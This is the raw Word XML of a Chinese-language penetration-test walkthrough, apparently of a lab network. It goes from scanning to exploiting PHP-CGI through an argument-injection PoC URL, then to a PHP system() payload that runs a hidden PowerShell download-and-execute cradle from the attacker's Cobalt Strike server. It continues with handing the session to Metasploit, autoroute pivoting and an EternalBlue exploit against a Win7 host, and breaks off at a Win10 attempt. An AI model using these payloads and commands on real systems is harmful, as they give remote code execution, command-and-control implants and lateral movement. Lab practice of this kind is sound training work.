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B9A75" w14:textId="710A5847" w:rsidR="00B14AB2" w:rsidRPr="00FF6FD0" w:rsidRDefault="00FF6FD0" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6FD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E98093" w14:textId="49B9121C" w:rsidR="00FF6FD0" w:rsidRDefault="00FF6FD0" w:rsidP="00FF6FD0">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p- --min-rate 1000 192.168.52.151</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF89051" w14:textId="368CE568" w:rsidR="00FF6FD0" w:rsidRDefault="00FF6FD0" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00FF6FD0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="227966AD" wp14:editId="50BE7B4C">
            <wp:extent cx="5274310" cy="32734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959B" w14:textId="13615A66" w:rsidR="00FF6FD0" w:rsidRPr="00FF6FD0" w:rsidRDefault="00FF6FD0" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6FD0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>目录扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D5BA86" w14:textId="3707E79C" w:rsidR="00FF6FD0" w:rsidRDefault="00FF6FD0" w:rsidP="00FF6FD0">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FF6FD0">
        <w:t>dirsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FF6FD0">
        <w:t xml:space="preserve"> -u http://192.168.52.151/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D400F5" w14:textId="4EE0C72B" w:rsidR="00FF6FD0" w:rsidRDefault="00FF6FD0" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00FF6FD0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2045A333" wp14:editId="793CA3C3">
            <wp:extent cx="5274310" cy="100647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1FC0" w14:textId="2419760F" w:rsidR="00FF6FD0" w:rsidRDefault="00FF6FD0" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00FF6FD0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FD2DDE2" wp14:editId="02982FEB">
            <wp:extent cx="5274310" cy="12020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C06E" w14:textId="37831A70" w:rsidR="00FF6FD0" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="004B79D7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B9A09D0" wp14:editId="0FE91426">
            <wp:extent cx="5274310" cy="371983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5591" w14:textId="1276023D" w:rsidR="00FF6FD0" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">HP CGI </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544091EF" w14:textId="4BA9694F" w:rsidR="004B79D7" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> :8.2.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D39D64A" w14:textId="10EAF2C4" w:rsidR="004B79D7" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="004B79D7">
        <w:t>Apache/2.4.58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207015DB" w14:textId="0703456F" w:rsidR="004B79D7" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0"/>
    <w:p w14:paraId="238B62C2" w14:textId="676B1D19" w:rsidR="004B79D7" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="004B79D7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13484597" wp14:editId="0A6E6804">
            <wp:extent cx="5274310" cy="1617345"/>
            <wp:effectExtent l="0" t="0" r="254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FA30" w14:textId="77777777" w:rsidR="004B79D7" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>OC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17830E19" w14:textId="45B6F64E" w:rsidR="00FF6FD0" w:rsidRPr="004B79D7" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B79D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{host}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B79D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/php-cgi/php-cgi.exe?%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B79D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E87F67B" w14:textId="5AAFE5B6" w:rsidR="00FF6FD0" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="004B79D7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="290C5C0C" wp14:editId="7E117C53">
            <wp:extent cx="5274310" cy="2242185"/>
            <wp:effectExtent l="0" t="0" r="254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AB71" w14:textId="0EF8E252" w:rsidR="00FF6FD0" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B79D7">
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B79D7">
        <w:t>teamserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B79D7">
        <w:t xml:space="preserve"> 192.168.52.128 123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E0B5D7" w14:textId="26985BCC" w:rsidR="00FF6FD0" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="004B79D7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E06637F" wp14:editId="644F21A9">
            <wp:extent cx="5274310" cy="1096645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30EA" w14:textId="6C20ED51" w:rsidR="00FF6FD0" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="004B79D7">
        <w:t>./cobaltstrike-client.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463D2BB2" w14:textId="29B1D487" w:rsidR="004B79D7" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接后创建监听器，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>attck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704CEFEA" w14:textId="640BE7FE" w:rsidR="004B79D7" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="004B79D7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B189B8F" wp14:editId="73EAB20D">
            <wp:extent cx="2391315" cy="2791456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4896" cy="279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DA6F" w14:textId="734D24B3" w:rsidR="004B79D7" w:rsidRDefault="004B79D7" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181818"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181818"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>die(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181818"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>system('</w:t>
      </w:r>
      <w:r w:rsidR="002C36B3" w:rsidRPr="002C36B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181818"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002C36B3" w:rsidRPr="002C36B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181818"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002C36B3" w:rsidRPr="002C36B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181818"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.52.128:82/a'))"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="181818"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>')); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDE6F3B" w14:textId="2AB1A8E8" w:rsidR="00FF6FD0" w:rsidRDefault="00531160" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上线成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E805B9F" w14:textId="467EDECA" w:rsidR="00FF6FD0" w:rsidRDefault="00531160" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00531160">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7091D8BF" wp14:editId="7BE1DF43">
            <wp:extent cx="5274310" cy="40322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B9D6" w14:textId="356959FA" w:rsidR="00322509" w:rsidRDefault="00D81EDE" w:rsidP="00322509">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>横向到win</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142F50B7" w14:textId="4FA9258C" w:rsidR="00FF6FD0" w:rsidRDefault="00531160" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> net time /domain</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确定目标不在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域环境</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FC09D9" w14:textId="778BA85B" w:rsidR="00531160" w:rsidRPr="002C36B3" w:rsidRDefault="00531160" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00531160">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43C696E1" wp14:editId="34971E44">
            <wp:extent cx="4745368" cy="1305453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5368" cy="130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6C06" w14:textId="42AEFD82" w:rsidR="00FF6FD0" w:rsidRDefault="006E1976" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ipconfig</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看网络环境，确定目标处于双卡环境，</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1976">
        <w:t>192.168.137.131</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC15BCB" w14:textId="7698298C" w:rsidR="00FF6FD0" w:rsidRDefault="006E1976" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="006E1976">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04541A81" wp14:editId="583655A8">
            <wp:extent cx="5274310" cy="314769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36B5" w14:textId="4A6C7289" w:rsidR="00FF6FD0" w:rsidRDefault="003B589E" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描结果：显示存在端口4</w:t>
      </w:r>
      <w:r>
        <w:t>45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA7B61B" w14:textId="73E03FC9" w:rsidR="00FF6FD0" w:rsidRDefault="00AB540A" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00AB540A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1990EE6A" wp14:editId="7CBC3DA4">
            <wp:extent cx="5274310" cy="45974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594B" w14:textId="414A48E8" w:rsidR="00E07AAB" w:rsidRDefault="00E07AAB" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r>
        <w:t>2012 =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:r>
        <w:t>17-010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581EA5FF" w14:textId="28447933" w:rsidR="00FF6FD0" w:rsidRDefault="00322509" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00322509">
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00322509">
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:t>S联动</w:t>
      </w:r>
      <w:r w:rsidRPr="00322509">
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00322509">
        <w:rPr>
          <w:rStyle w:val="20"/>
        </w:rPr>
        <w:t>SF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EA7131" w14:textId="1FFA23BD" w:rsidR="00322509" w:rsidRPr="00322509" w:rsidRDefault="00322509" w:rsidP="00FF6FD0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00322509">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00322509">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7F8A07" w14:textId="77777777" w:rsidR="00322509" w:rsidRDefault="00322509" w:rsidP="00322509">
      <w:r>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655318A6" w14:textId="77777777" w:rsidR="00322509" w:rsidRDefault="00322509" w:rsidP="00322509">
      <w:r>
        <w:t>set payload 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reverse_http</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3FE57777" w14:textId="77777777" w:rsidR="00322509" w:rsidRDefault="00322509" w:rsidP="00322509">
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6124DDEE" w14:textId="77777777" w:rsidR="00322509" w:rsidRDefault="00322509" w:rsidP="00322509">
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 7777</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A39CB85" w14:textId="414F1D1B" w:rsidR="00322509" w:rsidRDefault="00322509" w:rsidP="00322509">
      <w:r>
        <w:t>exploit -j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131C5B9E" w14:textId="4E99ED00" w:rsidR="00322509" w:rsidRDefault="00322509" w:rsidP="00322509">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322509">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>beacon执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022605E0" w14:textId="652AF0CF" w:rsidR="00322509" w:rsidRDefault="00322509" w:rsidP="00322509">
      <w:r w:rsidRPr="00322509">
        <w:t xml:space="preserve">spawn </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00322509">
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B6533AE" w14:textId="142BFD11" w:rsidR="00322509" w:rsidRPr="00322509" w:rsidRDefault="00322509" w:rsidP="00322509">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收到连接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4CE92E" w14:textId="1493C694" w:rsidR="00322509" w:rsidRDefault="00322509" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00322509">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0435D504" wp14:editId="0BC539BB">
            <wp:extent cx="5274310" cy="1026160"/>
            <wp:effectExtent l="0" t="0" r="2540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9F65" w14:textId="707E46B9" w:rsidR="00FF6FD0" w:rsidRDefault="00322509" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376C1128" w14:textId="4E59B21E" w:rsidR="00322509" w:rsidRDefault="00322509" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>essions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6213159E" w14:textId="7BC27A8A" w:rsidR="00322509" w:rsidRDefault="00322509" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00322509">
        <w:t>run post/multi/manage/autoroute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA135CE" w14:textId="2FB9317A" w:rsidR="00FF6FD0" w:rsidRDefault="00322509" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00322509">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EABD29C" wp14:editId="0A71F07A">
            <wp:extent cx="5274310" cy="1991360"/>
            <wp:effectExtent l="0" t="0" r="2540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6311E" w14:textId="77777777" w:rsidR="00AB540A" w:rsidRDefault="00AB540A" w:rsidP="00AB540A">
      <w:r>
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E471810" w14:textId="77777777" w:rsidR="00AB540A" w:rsidRDefault="00AB540A" w:rsidP="00AB540A">
      <w:r>
        <w:t>set payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bind_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1872FCF0" w14:textId="1691C61C" w:rsidR="00AB540A" w:rsidRDefault="00AB540A" w:rsidP="00AB540A">
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 192.168.137.140</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEB035A" w14:textId="7169DEBC" w:rsidR="00AB540A" w:rsidRDefault="00AB540A" w:rsidP="00AB540A">
      <w:r>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 4444   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF5AF72" w14:textId="05EC6B37" w:rsidR="00322509" w:rsidRDefault="00AB540A" w:rsidP="00AB540A">
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3793723C" w14:textId="5951FC7B" w:rsidR="00FF6FD0" w:rsidRDefault="008C3623" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="008C3623">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="394FD69F" wp14:editId="265A486F">
            <wp:extent cx="5274310" cy="870585"/>
            <wp:effectExtent l="0" t="0" r="2540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88E5" w14:textId="21047AE8" w:rsidR="00FF6FD0" w:rsidRDefault="00FF6FD0" w:rsidP="00FF6FD0"/>
    <w:p w14:paraId="43EBD539" w14:textId="26E45265" w:rsidR="00FF6FD0" w:rsidRDefault="00D81EDE" w:rsidP="00D81EDE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>横向到win</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BD7976" w14:textId="7EA8ADCB" w:rsidR="00FF6FD0" w:rsidRDefault="00D81EDE" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00D81EDE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28203571" wp14:editId="6241F871">
            <wp:extent cx="5274310" cy="156210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CB9D" w14:textId="5E81B903" w:rsidR="00FF6FD0" w:rsidRDefault="00D81EDE" w:rsidP="00FF6FD0">
      <w:r w:rsidRPr="00D81EDE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31A38946" wp14:editId="7E6A9629">
            <wp:extent cx="5274310" cy="1057275"/>
            <wp:effectExtent l="0" t="0" r="254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9DB7" w14:textId="44844B9C" w:rsidR="00FF6FD0" w:rsidRDefault="00D81EDE" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ms</w:t>
      </w:r>
      <w:r>
        <w:t>17-010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不可执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2255662E" w14:textId="0A904149" w:rsidR="00D81EDE" w:rsidRDefault="00D81EDE" w:rsidP="00FF6FD0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sear</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ch </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msb_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
